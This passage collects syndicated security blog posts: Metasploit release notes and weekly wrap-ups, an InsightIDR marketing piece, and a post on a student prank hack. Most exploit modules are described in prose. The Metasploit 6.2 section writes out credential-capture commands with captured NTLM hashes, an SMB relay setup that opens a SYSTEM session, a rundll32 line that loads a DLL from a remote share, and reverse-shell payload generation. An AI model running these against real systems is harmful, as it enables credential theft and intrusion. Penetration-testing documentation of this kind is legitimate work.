bojanisc
darrenmartyn
dismantl
entity0xfe
erikbomb
flogriesser
kalidor
lap1nou
llamasoft
luisfso
mauvehed
memN0ps
mrshu
namaenonaimumei
nfsec
nzdjb
ojasookert
om3rcitak
r3nt0n
rtpt-alexanderneumann
shoxxdj
ssst0n3
zha0gongz1

New module highlights

  • exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 – This exploit contributed by community member heyder facilitated unauthenticated code execution on multiple Fortinet products including FortiOS, FortiProxy and FortiSwitchManager.
  • exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 – Despite having a 2021 CVE, this particular vulnerability, contributed by community member h00die-gr3y, gained attention in 2022 for being an unauthenticated RCE in VMware’s NSX product. Being a deserialization vulnerability, exploitation is smooth and reliable.
  • auxiliary/gather/ldap_query – This new module allows users to gather useful information from an Active Directory Domain Services (AD DS) LDAP server. Metasploit currently includes 28 predefined queries for common actions like enumerating LAPS passwords, computer accounts, and users with configured Service Principal Names (SPNs) for Kerberoasting. Metasploit users can even define their own queries for use with the module.
  • exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc – This module, from community contributor h00die, added in support for CVE-2021-22015. vCenter is frequently targeted by attackers, so h00die’s contribution goes a long way in helping pen testers better assess the security of vCenter servers during their engagements.
  • exploit/linux/http/cisco_asax_sfr_rce – This module was added by jbaines-r7 and incorporated an exploit for CVE-2022-20828 that allows authenticated attackers to gain root-level shells on vulnerable Cisco ASA-X devices with FirePOWER Services enabled. These devices are frequently positioned in sensitive pivots within networks, and are prime targets for attackers, so gaining RCE on these devices often results in access to privileged networks and/or data.
  • exploit/multi/veritas/beagent_sha_auth_rce – This module from community contributor c0rs exploits CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent to bypass authentication and gain remote code execution as SYSTEM/root. This is quite a nice vulnerability since backup agents typically have access to sensitive information, so any compromise of such devices typically leads to access to sensitive company data. Combine this with SYSTEM/root privileges as an unauthenticated remote user, and you have a decent vulnerability for gaining initial access into a network and gaining information to start your pivoting attempts to other segments of that network.

Version 6.2 released

Over the summer, the Metasploit team announced the release of Metasploit Framework 6.2, which included a number of new features. Some of the highlights:

  • A streamlined authentication capturing plugin
  • An SMB 2 and 3-capable file server
  • Improved options for handling NATed services
  • Improved SMB relaying

We’re planning a 6.3 feature release in early 2023, so stay tuned for the next round of new Metasploit capabilities and improvements!

E-Z-2-contribute documentation

As of the 6.2 release, Metasploit has a new, user-contributable docs site at https://docs.metasploit.com/. Want to contribute to Metasploit, but don’t want to monkey around with Ruby or exploit code? We can always use more and better documentation on your favorite Metasploit features, workflows, and improvements. Get in there and help us teach people how hacking works!

From all of us at Rapid7, we wish you a very happy new year. As always, you can get the latest Metasploit updates every Friday in our weekly wrap-up, and you can stay up-to-date on vulnerability intelligence with AttackerKB.

Metasploit Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2022/12/09/metasploit-wrap-up-156/

Login brute-force utility

Metasploit Wrap-Up

Jan Rude added a new module that gives users the ability to brute-force login for Linux Syncovery. This expands Framework’s capability to scan logins to Syncovery, a popular web GUI for backups.

WordPress extension SQL injection module

Cydave, destr4ct, and jheysel-r7 contributed a new module that takes advantage of a vulnerable WordPress extension. This allows Framework users to take advantage of CVE-2022-0739, leveraging a UNION-based SQL injection to gather hashed passwords of WordPress users. For vulnerable versions, anyone who can access the BookingPress plugin page will also have access to all the credentials in the database, yikes! There are currently 3,000 active installs of the plugin, which isn’t a huge number by WordPress standards—but the ease of remote exploitation makes it a fun addition to the framework.

New module content (3)

Enhancements and features (2)

  • #17214 from h00die – This PR improves upon the data gathered on a vCenter server originally implemented in #16871, including library integration, optimization, and de-duplication.
  • #17332 from bcoles – Updates windows/gather/enum_proxy to support non-Meterpreter sessions (shell, PowerShell).

Bugs fixed (5)

  • #17183 from rbowes-r7 – This adds some small changes, cleanups, and fixes to the linux/http/zimbra_unrar_cve_2022_30333 and linux/http/zimbra_cpio_cve_2022_41352 Zimbra exploit modules, along with linux/local/zimbra_slapper_priv_esc documentation. Particularly, this fixes an issue that prevented the exploit modules from working properly when the handler was prematurely shut down.
  • #17305 from cgranleese-r7 – Updates Metasploit’s RPC to automatically choose an appropriate payload if module.execute is invoked without a payload set. This mimics the functionality of msfconsole.
  • #17323 from h00die – Fixes a bug when attempting to detect enlightenment_sys in exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.
  • #17330 from zeroSteiner – This fixes an issue in the ProxyShell module, which limited the email enumeration to 100 entries. Now, it correctly enumerates all the emails before finding one that is suitable for exploitation.
  • #17342 from gwillcox-r7 – This adds the necessary control to the search queries used to find vulnerable certificate templates in an AD CS environment. Prior to this, non-privileged users would not be able to read the security descriptor field.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/10/14/metasploit-wrap-up-155/

Spring Cloud Gateway RCE

Metasploit Wrap-Up

This week, a new module that exploits a code injection vulnerability in Spring Cloud Gateway (CVE-2022-22947) has been added by @Ayantaker. Versions 3.1.0 and 3.0.0 to 3.0.6 are vulnerable if the Gateway Actuator endpoint is enabled, exposed and unsecured. The module sends a specially crafted SpEL expression to this endpoint and gets command execution as the user running Spring Cloud Gateway. A first request is sent to create a route with a filter including the SpEL expression which will be parsed with a StandardEvaluationContext. A second request is sent to reload the route and trigger code execution.

pfSense pfBlockNG plugin unauthenticated RCE

Our very own @jheysel-r7 added a module that exploits an OS command injection vulnerability in pfSense’s pfBlockerNG plugin versions 2.1.4_26 and below and identified as CVE-2022-31814. The module sends an HTTP request with a payload in the Host: header, which will be executed by the PHP’s exec() function. This leads to unauthenticated remote command execution as root. Note that this pfSense module is not installed by default but is commonly used to block inbound connections from countries or IP ranges.

New module content (2)

  • Spring Cloud Gateway Remote Code Execution by Ayan Saha, which exploits CVE-2022-22947 – A new module has been added in for CVE-2022-22947, an unauthenticated RCE in Spring Cloud Gateway versions 3.1.0 and 3.0.0 to 3.0.6 when the Gateway Actuator endpoint is enabled, exposed and unsecured. Successful exploitation results in arbitrary code execution as the user running Spring Cloud Gateway.
  • pfSense plugin pfBlockerNG unauthenticated RCE as root by IHTeam and jheysel-r7, which exploits CVE-2022-31814 – A module has been added for CVE-2022-31814, an unauthenticated RCE in the pfSense plugin within pfBlockerNG that allows remote unauthenticated attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. Versions <= 2.1.4_26 are vulnerable. Note that version 3.X is unaffected.

Enhancements and features (2)

  • #17123 from h00die – The netrc and fetchmail modules have been updated to include documentation on how to use the modules.
  • #17092 from bcoles – This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.

Bugs fixed (3)

  • #16987 from jmartin-r7 – Improves scanner/smb/smb_login to gracefully handle additional error conditions when connecting to target services.
  • #17075 from cdelafuente-r7 – The Windows secrets dump module was failing early for non-administrative users. This fixes the issue so the module now throws warnings where it was previously failing early. Now the module can complete the DOMAIN action whereas before it was failing prior to reaching this point.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

A SIEM With a Pen Tester’s Eye: How Offensive Security Helps Shape InsightIDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/10/14/a-siem-with-a-pen-testers-eye-how-offensive-security-helps-shape-insightidr/

A SIEM With a Pen Tester's Eye: How Offensive Security Helps Shape InsightIDR

To be great at something, you have to be a little obsessed. That’s true whether you want to be a chess grandmaster, become an internationally recognized CEO, or build the best cybersecurity platform on the planet.

At Rapid7, our laser-focus has always been trained on one thing: helping digital defenders spot and stop bad actors. From the start of our story, penetration testing — or pen testing, for short — has been one of the cornerstones of that obsession. The offensive security mindset influenced the way we built and designed InsightIDR, our cloud-native XDR and SIEM.

On the offensive

Before we ever released InsightIDR, there was Metasploit, an open-source pen testing framework. Originally developed by HD Moore, Metasploit allows offensive security teams to think like attackers and infiltrate their own organizations’ environments, pushing the boundaries to see where their systems are vulnerable. Those insights help the business identify the most serious issues to prioritize and patch, remediate, or mitigate.

Offensive security strategies provide a much-needed foundation for assessing your risk landscape and staying a step ahead of threats — but the task of building and operationalizing a security strategy doesn’t end there.

“The biggest misconception about pen testing that I hear repeatedly is, ‘We’re going to pen-test to test our response time or test our tools,'” says Jeffrey Gardner, Rapid7’s Practice Advisor for Detection and Response. “That’s not the purpose of a pen test.”

Pen testing is a critical step in understanding where and how your organization is vulnerable to attackers, and what kinds of activities within your environment might indicate a breach. This is essential information for setting up the detections that your security operations center (SOC) team needs in order to effectively safeguard your systems against intrusion — but they also need a tool that lets them set up those detections, so they can get alerts based on what matters most for your organization’s specific environment.

Pen testing itself isn’t that tool, nor does it test the effectiveness of the tools you have. Rather, pen testing looks for your weaknesses – and once they’re  found, looks for ways to exploit them, including using stolen credentials to move across the network.

Mapping how bad actors behave

That’s where the importance of having a security incident and event management (SIEM) solution built with offensive security in mind comes in — and that’s exactly what our years of experience helping organizations run pen tests and analyze their attack surface have allowed us to build. InsightIDR is a unified SIEM and XDR platform designed with a pen tester’s eye. And the key to that design is user and entity behavior analytics (UEBA).

See, the problem with detecting attackers in your network is that, to the human eye, they can look a lot like regular users. Once they’ve hacked a password or stolen login credentials through a phishing/scam attack, their activities can look relatively unremarkable — until, of course, they make the big move: a major escalation of privilege or some other vector that allows them to steal sensitive data or upend systems entirely.

It takes years of experience understanding how attackers behave once they penetrate networks — and the subtle ways those patterns differ from legitimate users — to be able to catch them in your environment. This is exactly the type of expertise that Rapid7 has been able to gain through 10+ years of in-the-trenches experience in penetration testing, executed through Metasploit. Everything we had learned about User and Entity Behavior Analytics (UEBA) went into  InsightIDR.

InsightIDR continuously baselines healthy user activity in the context of your specific organization. This way, the tool can spot suspicious activity fast — including lateral movement and the use of compromised credentials — and generate alerts so your team can respond swiftly. This detections-first approach means InsightIDR comes with a deep level of insight that’s based on years of studying the attacker, as well as an understanding of what alerts matter most to SOC teams.

Watch a free demo today to see InsightIDR’s attacker-spotting power in action.

High-School Graduation Prank Hack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/high-school-graduation-prank-hack.html

This is a fun story, detailing the hack a group of high school students perpetrated against an Illinois school district, hacking 500 screens across a bunch of schools.

During the process, the group broke into the school’s IT systems; repurposed software used to monitor students’ computers; discovered a new vulnerability (and reported it); wrote their own scripts; secretly tested their system at night; and managed to avoid detection in the school’s network. Many of the techniques were not sophisticated, but they were pretty much all illegal.

It has a happy ending: no one was prosecuted.

A spokesperson for the D214 school district tells WIRED they can confirm the events in Duong’s blog post happened. They say the district does not condone hacking and the “incident highlights the importance of the extensive cybersecurity learning opportunities the District offers to students.”

“The District views this incident as a penetration test, and the students involved presented the data in a professional manner,” the spokesperson says, adding that its tech team has made changes to avoid anything similar happening again in the future.

The school also invited the students to a debrief, asking them to explain what they had done. “We were kind of scared at the idea of doing the debrief because we have to join a Zoom call, potentially with personally identifiable information,” Duong says. Eventually, he decided to use his real name, while other members created anonymous accounts. During the call, Duong says, they talked through the hack and he provided more details on ways the school could secure its system.

EDITED TO ADD (9/13): Here’s Minh Duong’s Defcon slides. You can see the table of contents of their report on page 59, and the school’s response on page 60.

Announcing Metasploit 6.2

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/

Announcing Metasploit 6.2

Metasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we’ve added:

  • 138 new modules
  • 148 enhancements and features
  • 156 bug fixes

Top modules

Each week, the Metasploit team publishes a Metasploit wrap-up with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).

Remote Exploitation

  • VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits CVE-2021-44228: A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as root / SYSTEM. This exploit has been tested on both Windows and Linux targets.
  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388: This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954: This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.
  • Zyxel Firewall ZTP Unauthenticated Command Injection by jbaines-r7, which exploits CVE-2022-30525: This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the nobody user. The vulnerability was discovered by Rapid7 researcher Jake Baines.

Local Privilege Escalation

Capture plugin

Capturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the auxiliary/server/capture namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, a new capture plugin can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.

After running the load capture command, the captureg command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.

In the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:

msf6 > load capture
[*] Successfully loaded plugin: Credential Capture
msf6 > captureg start --ip 192.168.123.128
Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt
Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339
[+] Authentication Capture: DRDA (DB2, Informix, Derby) started
[+] Authentication Capture: FTP started
[+] HTTP Client MS Credential Catcher started
[+] HTTP Client MS Credential Catcher started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: MSSQL started
[+] Authentication Capture: MySQL started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: PostgreSQL started
[+] Printjob Capture Service started
[+] Authentication Capture: SIP started
[+] Authentication Capture: SMB started
[+] Authentication Capture: SMTP started
[+] Authentication Capture: Telnet started
[+] Authentication Capture: VNC started
[+] Authentication Capture: FTP started
[+] Authentication Capture: IMAP started
[+] Authentication Capture: POP3 started
[+] Authentication Capture: SMTP started
[+] NetBIOS Name Service Spoofer started
[+] LLMNR Spoofer started
[+] mDNS Spoofer started
[+] Started capture jobs

Opening a new terminal in conjunction with the tail command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:

$ tail -f  ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.123.136
[SMB] NTLMv2-SSP Username   : EXAMPLE\Administrator
[SMB] NTLMv2-SSP Hash       : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000

It is also possible to log directly to stdout without using the tail command:

captureg start --ip 192.168.123.128 --stdout

SMB v3 server support

This work builds upon the SMB v3 client support added in Metasploit 6.0.

Metasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point

This can be useful for copying files onto remote targets, or for running remote DLLs:

copy \\192.168.123.1\home\example.txt .
rundll32.exe \\192.168.123.1\home\example.dll,0

All remaining Metasploit modules have now been updated to support SMB v3. Some examples:

  • exploit/windows/smb/smb_delivery: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as rundll32.exe \\192.168.123.128\tHKPx\WeHnu,0
  • exploit/windows/smb/capture: This module creates a mock SMB server that accepts credentials before returning NT_STATUS_LOGON_FAILURE. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking
  • exploit/windows/dcerpc/cve_2021_1675_printnightmare: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.
  • exploit/windows/smb/smb_relay: Covered in more detail below.

Enhanced SMB relay support

The windows/smb/smb_relay has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.

Improved pivoting / NATed services support

Metasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on — in this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

# Set where the target connects to Metasploit. ListenerBindAddress is a new option.
set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

# Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.
set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26

Debugging Meterpreter sessions

There are now two ways to debug Meterpreter sessions:

  1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
  2. Generate a custom Meterpreter debug build with extra logging present

Log Meterpreter TLV packets

This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:

msf6 > setg SessionTlvLogging true
SessionTlvLogging => true

Here’s an example of logging the network traffic when running the getenv Meterpreter command:

meterpreter > getenv USER

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP       tlvs=[
    #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
    #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE       meta=STRING     value="demo_user">
  ]>
]>

Environment Variables
=====================

Variable  Value
--------  -----
USER      demo_user

Meterpreter debug builds

We have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set MeterpreterDebugBuild to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting MeterpreterDebugLogging to rpath:/tmp/meterpreter_log.txt.

For example, within msfconsole you can generate a new payload and create a handler:

use payload/python/meterpreter_reverse_tcp
generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false
to_handler

Running the payload will show the Meterpreter log output:

$ python3 shell.py
DEBUG:root:[*] running method core_negotiate_tlv_encryption
DEBUG:root:[*] Negotiating TLV encryption
DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001
DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966
DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46
DEBUG:root:[*] TLV encryption sorted
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_set_session_guid
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
... etc ...

For full details, see the Debugging Meterpreter Sessions documentation.

User-contributable docs

We have now released user-contributable documentation for Metasploit, available at https://docs.metasploit.com/. This new site provides a searchable source of information for multiple topics including:

Contributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the docs folder.

Local exploit suggester improvements

The post/multi/recon/local_exploit_suggester post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.

Now with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.

Upcoming roadmap work

In addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Wrap-Up

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2022/04/08/metasploit-wrap-up-151/

Windows Local Privilege Escalation for standard users

Metasploit Wrap-Up

In this week’s release, we have an exciting new module that has been added by our very own Grant Willcox which exploits (CVE-2022-26904)[https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904], and allows for normal users to execute code as NT AUTHORITY/SYSTEM on Windows machines from Windows 7 up to and including Windows 11. Currently, the vulnerability is still not patched and there have not been any updates from MSRC regarding this vulnerability, however it may be patched in the next Patch Tuesday.

This exploit requires more than one local user to be present on the machine and the PromptOnSecureDesktop setting to be set to 1, which is the default setting.

MacOS exploitation

Our very own space-r7 has updated the recent GateKeeper module to add support for the recent CVE-2022-22616, which can be used to target all MacOS Catalina versions, and MacOS Monterey versions prior to 12.3.

This module can be used to remove the com.apple.quarantine extended attribute on a downloaded/extracted file and allows for code to be executed on the machine.

Enumerating Chocolatey applications

This week’s release also features a new module from a first-time contributor rad10, which will enumerate all applications that have been installed using Chocolatey.

This could be used when gathering information about a compromised target and potentially vulnerable software present on the machine.

New module content (5)

  • User Profile Arbitrary Junction Creation Local Privilege Elevation by Grant Willcox and KLINIX5, which exploits CVE-2022-26904 – This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user’s credentials, to execute code as NT AUTHORITY\SYSTEM. The PromptOnSecureDesktop setting must also be set to 1 on the affected machine for this exploit to work, which is the default setting.
  • ALLMediaServer 1.6 SEH Buffer Overflow by Hejap Zairy Al-Sharif, which exploits CVE-2022-28381 – A new module has been added in which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.
  • Windows Gather Installed Application Within Chocolatey Enumeration by Nick Cottrell – This adds a post module that enumerates applications installed with Chocolatey on Windows systems.
  • #16082 from usiegl00 – This updates the shadow_mitm_dispatcher module by adding a new RubySMB Dispatcher, whichallows a better integration with RubySMB and enables the use of all the features provided by its client. Both SMBv2 and SMBv3 are now supported.
